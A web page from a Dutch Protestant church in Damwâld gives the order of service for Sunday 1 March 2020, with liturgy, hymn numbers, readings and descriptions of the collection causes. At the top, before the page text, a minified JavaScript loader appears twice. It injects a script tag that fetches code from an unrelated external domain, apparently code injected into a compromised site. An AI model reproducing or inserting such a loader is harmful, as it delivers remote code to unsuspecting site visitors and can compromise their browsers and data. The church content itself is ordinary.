;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 maart 2020 9:30 uur - PKN Damwâld
zondag 1 maart 2020
09:30 uur
Koffiedrinken in 't Skûlplak na de dienst

Kerkdienst zondag 1 maart 2020 9:30 uur

Thema: Bevestiging en afscheid ambtsdragers

Informatie

Voorganger:Ds. G.J. Otter
Organist:Anja van der Veen
Thema:Bevestiging en afscheid ambtsdragers
Mededeling:Koffiedrinken in 't Skûlplak na de dienst
Liturgie
lied voor de dienst Nlb 149 : 1 en 2
Welkomswoord
Intochtslied Nlb 100 : 1 en 2
Stilgebed, Votum en Groet
We zingen: Elb 479 : 1 en 2
Wetslezing .
We zingen: Nlb 912 : 1, 2 en 5
Gebed
We lezen: Ef. 4 : 1 - 16
We zingen: Nlb 834 : 1 en 2
Preek .
We zingen: Nlb 968 : 1 en 2
Formulier en bevestiging
We zingen: Nlb 134 : 1 en 3
Dankwoord
Dankgebed en voorbede
Collecte
Slotlied Elb 79 : 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Ontmoeting

Stichting Ontmoeting
Vastgelopen mensen worden door de Stichting Ontmoeting ondersteund om hun leven weer op orde te krijgen. Stichting Ontmoeting leert hen weer om op eigen benen te staan, relaties aan te gaan en te onderhouden en de juiste keuzes te maken. Zo krijgen ze weer perspectief in hun leven. Dank zij de vrijwilligers en medewerkers van Stichting Ontmoeting kan deze missie uitgevoerd worden. Ze zetten zich met hart en ziel in voor hun medemens. Door een luisterend oor of praktische begeleiding te bieden. Of door ondersteunende taken te verrichten.

Tweede collecte: Kerk
Uitganscollecte: 40Dagentijdcollecte - Voorjaarszendingscollecte

40Dagentijdcollecte - Voorjaarszendingscollecte: Golfstaten – De kracht van Bijbelverhalen
Hoewel het aantal christenen in het Midden-Oosten in rap tempo afneemt, is een tegenovergestelde trend zichtbaar in de Golfstaten. Hier groeit de kerk door de grote toestroom van arbeidsmigranten uit landen als India, Nepal en de Filipijnen. De meesten van hen zijn ongeletterd. Tegelijkertijd willen ze graag meer leren over de Bijbel. Kerk in Actie traint voorgangers in de storytelling-methode: een succesvolle interactieve methode waarbij Bijbelverhalen mondeling worden verteld en men met elkaar op zoek gaat naar de betekenis ervan voor het eigen leven. De arbeidsmigranten, die vaak een zwaar en eenzaam bestaan leiden, putten nieuwe moed uit deze verhalen. Bemoedig hen met uw collecte!